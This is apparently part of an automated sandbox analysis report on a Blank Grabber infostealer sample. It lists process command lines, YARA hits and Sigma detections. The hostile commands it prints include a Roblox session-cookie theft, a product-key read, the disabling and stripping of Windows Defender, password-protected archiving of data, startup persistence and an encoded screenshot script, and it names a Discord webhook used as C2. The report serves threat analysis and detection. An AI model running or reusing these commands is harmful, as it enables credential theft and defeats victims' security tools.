cmd.exe (PID: 6404 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

getmac.exe (PID: 7988 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)

cmd.exe (PID: 1448 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8008 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 5304 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 1180 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 3392 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 1940 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 3336 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5548 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7336 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7172 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 4620 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 4612 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 1248 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7984 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 6168 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 628 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7212 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rar.exe (PID: 7036 cmdline: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)

cmd.exe (PID: 8028 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 5352 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 1592 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7956 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 8132 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 6404 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 6392 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7948 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 3408 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 2376 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 4448 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2536 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)

MpCmdRun.exe (PID: 7836 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)

conhost.exe (PID: 2880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Configuration

Threatname: Blank Grabber

{"C2 url": "https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\_MEI78082\rarreg.key	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1299449724.00000213D8524000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000000.00000003.1299449724.00000213D8522000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000002.1748349929.0000018C7F317000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000003.1739009557.0000018C01A4F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: sppawx.exe PID: 7808	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: sppawx.exe PID: 7860	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: sppawx.exe PID: 7860	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: sppawx.exe PID: 7860	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 4 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sppawx.exe", ParentImage: C:\Users\user\Desktop\sppawx.exe, ParentProcessId: 7860, ParentProcessName: sppawx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'", ProcessId: 7924, ProcessName: cmd.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sppawx.exe", ParentImage: C:\Users\user\Desktop\sppawx.exe, ParentProcessId: 7860, ParentProcessName: sppawx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7932, ProcessName: cmd.exe

Sigma detected: Rar Usage with Password and Compression Level

Source: Process started

Author: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sppawx.exe", ParentImage: C:\Users\user\Desktop\sppawx.exe, ParentProcessId: 7860, ParentProcessName: sppawx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *", ProcessId: 7212, ProcessName: cmd.exe

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 7956, StartAddress: FC9B32B0, TargetImage: C:\Windows\System32\conhost.exe, TargetProcessId: 7956

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Startup Folder Persistence

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\sppawx.exe, ProcessId: 7860, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACA